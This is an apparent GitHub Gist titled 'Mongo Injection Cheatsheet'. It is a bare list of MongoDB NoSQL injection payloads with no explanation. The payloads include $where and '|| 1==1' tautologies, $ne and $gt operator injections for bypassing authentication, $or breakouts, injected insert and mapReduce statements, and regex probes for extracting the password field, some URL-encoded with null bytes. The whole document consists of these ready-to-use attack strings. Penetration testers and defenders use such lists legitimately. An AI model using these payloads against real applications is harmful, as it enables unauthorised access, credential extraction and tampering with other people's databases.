Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Mongo Injection Cheatsheet

true, $where: '1 == 1'

, $where: '1 == 1'

$where: '1 == 1'

', $where: '1 == 1'

1, $where: '1 == 1'

{ $ne: 1 }

', $or: [ {}, { 'a':'a

' } ], $comment:'successful MongoDB injection'

db.injection.insert({success:1});

db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1

|| 1==1

' && this.password.match(/.*/)//+%00

' && this.passwordzz.match(/.*/)//+%00

'%20%26%26%20this.password.match(/.*/)//+%00

'%20%26%26%20this.passwordzz.match(/.*/)//+%00

{$gt: ''}

{"$gt": ""}

[$ne]=1

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment